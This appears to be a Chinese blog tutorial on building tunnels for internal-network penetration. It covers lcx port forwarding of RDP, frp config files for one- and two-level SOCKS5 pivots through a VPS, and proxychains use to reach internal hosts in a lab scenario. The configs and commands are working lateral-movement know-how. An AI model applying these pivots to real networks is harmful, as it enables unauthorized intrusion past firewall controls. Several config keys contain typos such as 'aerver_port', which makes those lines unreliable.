首页 > 其他分享 >内网渗透-隧道搭建

内网渗透-隧道搭建

时间:2024-05-26 22:25:29浏览次数:23  
标签:隧道 渗透 端口 代理服务器 web1 4444 port 搭建

一、前言

为什么要进行代理搭建?因为目标主机会把一些可利用的端口给禁了,或者说内网 的防火墙不允许这些端口出现,那么这时候就需要搭建一个隧道,什么是隧道,对于小白来说可能有点抽象,其实就是主机与攻击机之间的通讯端口,然后还会设计到端口转发或者是端口映射的问题。

端口转发一般发生在一个主机里面,将800端口的流量转到900,而端口映射一般是两个主机,比如访问A主机的800端口就相当于访问B主机的900端口。但对其并没有多大的区分。

这里介绍lcx 和frp的使用。其他不讲。

二、需要搭建代理的场景

根据场景的复杂度通常需要设置一级代代理、二级代理....如果目标无公网ip就得使用VPS

1.场景一

最简单的场景:

攻击机kali

内网:
web1: 10.10.10.13(内网地址) (192.168.8.x)外网地址
DC: 10.10.10.11(不出网)
cilent1: 10.10.10.14(内网地址,不出网)

从这可以看到我们如果想要拿下cilent1,可以通过web1主机去。因为kali又不能与cilent1通讯。所以需要搭建代理。

目标

端口转发:**比如我要控制web1的桌面,需要通过3389来控制,但是防火墙不让外部地址有3389,但是可以4444的话,那我就可以使用端口转发。使得kali访问web1的4444端口就相当于访问3389.。

**端口映射:**但是如果我想使用的是cilent的3389,那我可以将cilent的3389映射到web1的4444

1.1 使用lcx进行端口转发

web1执行:

lcx.exe -tran 4444 127.0.0.1 3389

攻击机执行

rdesktop 192.168.8.x:4444

1.2 使用lcx进行端口映射

web1执行:

lcx.exe -tran 4444 10.10.10.14 3389

攻击机执行

rdesktop 192.168.8.x:4444

2.场景二

但是如果web1没有外网地址(192.168.8.x),只有内网地址(10.10.10.13),但是出网,可以使用frp以及vps进行搭建隧道。

这种场景搭建一级代理。

假设vps的地址为 43.143.93.88

目标:

端口转发:我要控制web1的3389,但是我只能允许4444进入。那么就可以将4444的流量转发到3389。

想ssh登录进入cilent1

frp搭建一级代理思路。在vps和web1之间搭建一个隧道,搭建这个隧道的时候对于vps会涉及到两个端口。一个是默认的7000连接frp的端口,一个是用户自定义的隧道端口。新手可能会很容易搞混这两个端口。默认的7000端口我们不用在意,只管客户端设置的remote_port.

2.1 使用frp搭建一级代理

将Vps作为服务端。把frps上传,并设置frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

web1作为客户端,配置frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
remote_port = 4444 #vps与web1之间的隧道端口,所有流量都通过vps的4444端口到达web1的4444端口
plugin = socks5	#vps可作为一个socks5的代理服务器。

plugin是一个插件,赋值socks5,意思是可以建立socks5代理服务器。什么意思,就是可以把它当做一个中间服务器进行传输。当然你可以都加,plugin = socks5。

然后在kali上将数据包流量扔到隧道里面。kali自带proxychains,配置proxychains.conf设置代理服务器:

socks5 43.143.93.88 4444

再运行

proxychain rdesktop 10.10.10.13:3389
或者
proxychain ssh [email protected]

这个就是把这个数据包的流量扔到vps这个代理服务器上,端口是4444,然后这个流量就会到达目标主机进行解析。

3.场景三

假设现在有另外一个主机cilent2 内网地址是10.10.20.5,可以与client1连接。但是我想在攻击机上ssh连接client2.

那么现在就必须再搭条隧道进入cilent1与cilent2所在的网段;

{%asset_image 1.png %}

3.1 frp搭建二级代理

将vps与web1作为代理服务器

vps的frps配置不变

web1 配置

frpc.ini

[common]
server_addr = 43.143.93.88
aerver_port = 7000

[socks5]
type = tcp 
local_port = 10808 #将1080隧道接受到的流量转发到10808,要转发流量,使用tcp协议。所以type=tcp
remote_port = 1080
plugin = socks5

这样第一条隧道搭建完毕。

同时它也要作为一个代理服务器,那么配置frps.ini,能在web1与cilent1之间建立一个隧道.成为第二条隧道

[common]
bind_addr = 10.10.10.13
bind_port = 7000

cilent1配置

frpc.ini

[common]
server_addr = 10.10.10.13
aerver_port = 7000

[socks5]
type = tcp #为什么要type=tcp,因为在第一条隧道的时候,数据包是tcp协议转发到10808的。
remote_port = 10808
plugin = socks5

到此两条隧道搭建完毕。

kali攻击

kali 可以通过proxchains来实现将流量包转发到vps这个第一个代理服务器,然后就会传到cilent1。

proxychains.conf配置好之后,就可以运行下面命令连接cilent2

proxychains ssh [email protected]

三级代理一样的,把cilent2加个frps.

三、frp的其他使用补充

frp进行内网穿透的时候,还有其他配置,比如,搭好隧道之后,把流量转发到22端口,就可以连接内网的22,将流量转发到其他部署有网站的端口,就可以通过vps访问到内网网站。但是一定要注意type.想连接22,就走tcp,想web,就可以走tcp也可以http.只不过http还得布置域名。

frps服务端不变。

主要是客户端frpc.ini

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
type = tcp
local_port =22
remote_port = 1080

[web]
type = tcp
local_port =80 #或者其他站点端口
remote_port = 4444

上述配置就可以直接通过操作43.143.93.88的相应端口来达到相关服务,比如要连接这个客户端的ssh

ssh -p 1080 [email protected]

要访问这个客户端内网的网站,直接浏览器访问http://43.143.93.88:4444就能访问。

但是如果是配置了代理服务器,搞了隧道,也就是frpc.ini的配置如下

[common]
server_ip = 43.143.93.88
server_port = 7000

[ssh]
remote_port = 1080
plugin = socks5

没有type = tcp 就不能访问。就算你配置了local_port = 22 或者88,都不能成功转发流量,也就是说,要进行端口转发流量必须加上type。

如果没加,就像上面一样,那么就是只搭建了一个代理服务器。

通过代理插件来实现。代理插件kali有proxychain,相关操作也有。代理插件或者软件的作用就是将数据包流量发送到代理服务器。

kali 直接配置文件,使用时就在命令前加上proxychain .

Windows可以使用proxifier。在设置代理服务器的时候,就可以设置 43.143.93.88 1080

再设置相应的规则就可以将流量经过代理服务器。

标签:隧道,渗透,端口,代理服务器,web1,4444,port,搭建
From: https://www.cnblogs.com/iruan/p/18214391

相关文章

  • 内网渗透-Windows常用提权方法
    一、前言将介绍常见的提权方法。从为什么该方法能够提权(原理)到使用方法。二、系统内核漏洞提权1.为什么能提权?内核漏洞通常是指内核溢出漏洞,什么溢出呢?缓冲区溢出。那什么是缓冲区溢出呢?当应用程序或者是内核的驱动程序在接受用户输入的数据的时候,它会把这些数据存储在缓冲区......
  • YOLOv10 | 手把手教你利用yolov10训练自己数据集(含环境搭建 + 参数解析 + 数据集查找
    一、前言本文内含YOLOv10网络结构图+各个创新模块手撕结构图+训练教程+推理教程+  参数解析+环境搭建+数据集获取等一些有关YOLOv10的内容!目录一、前言 二、整体网络结构图 三、空间-通道分离下采样3.1SCDown介绍 3.2C2fUIB介绍3.3PSA介绍4.4更......
  • 【MySQL数据库】认识数据库+环境搭建--------Windows系统
    一、认识数据库数据库(Database)是按照数据结构来组织、存储和管理数据的仓库。二、MySQL数据库MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle公司。MySQL是一种关联数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大......
  • 用github搭建免费的私人图床,白嫖真香
    大家好,我是小义。最近在弄个人博客网站,参考了一些前辈们的作品,发现大家存储图片的时候都是用的对外链接,不需要引用图片的相对路径,这样一篇博客文章只需要一个markdown格式的文件来保存就可以了,确实很方便。存放图片的地方就是图床,是一个网络服务,用户在上面上传图片后,可以获......
  • Blog的图床搭建
    本图床搭建基于GitHub+PicGo+jsDelivr本文仅为个人操作方法文章中如有谬误,请多指教1.下载PicGo在PicGO官网下载PicGo2.在GitHub中获取tokens如果你的GitHub中没有repositories或者你想为你的图床创立一个新的repository,请先创建一个新repository并在里面上传图片......
  • Blog的图床搭建
    本图床搭建基于GitHub+PicGo+jsDelivr本文仅为个人操作方法文章中如有谬误,请多指教1.下载PicGo在PicGO官网下载PicGo2.在GitHub中获取tokens如果你的GitHub中没有repositories或者你想为你的图床创立一个新的repository,请先创建一个新repository并在里面上传图片在右侧......
  • 【wiki知识库】01.wiki知识库前后端项目搭建(SpringBoot+Vue3)
      ......
  • ADI史上最强的一颗DSP,TS201的开发怎么去做,我来教你入门二:硬件环境的搭建
    编者的话TigerSHARC是ADI最早的浮点DSP之一,中文别名虎鲨。本人有幸在2004年接触过一段时间,其“珍稀”程度仅次于ADSP-218X和ADSP-2106X。这个系列的DSP应该是当年的以色列研发团队做的,以性能超强,片上SRAM巨大,以及LINKPORT级联技术和昂贵的售价而著称。很可......
  • [书生·浦语大模型实战营]——第三节:茴香豆:搭建你的 RAG 智能助理
    0.RAG概述定义:RAG(RetrievalAugmentedGeneration)技术,通过检索与用户输入相关的信息片段,并结合外部知识库来生成更准确、更丰富的回答。解决LLMs在处理知识密集型任务时可能遇到的挑战,如幻觉、知识过时和缺乏透明、可追溯的推理过程等。提供更准确的回答、降低推理成......
  • 使用树梅派搭建Golang、Python、NodeJs的开发服务器
    使用树梅派搭建Golang、Python、NodeJs的开发服务器安装系统安装rpi-imagersudoaptinstallrpi-imager打开rpi-imager烧写RaspberryPiOSLite(64-bit)系统设置好用户名、密码、wifi、ssh等信息上电修改镜像源备份/etc/apt/sources.listsudocp/etc/apt......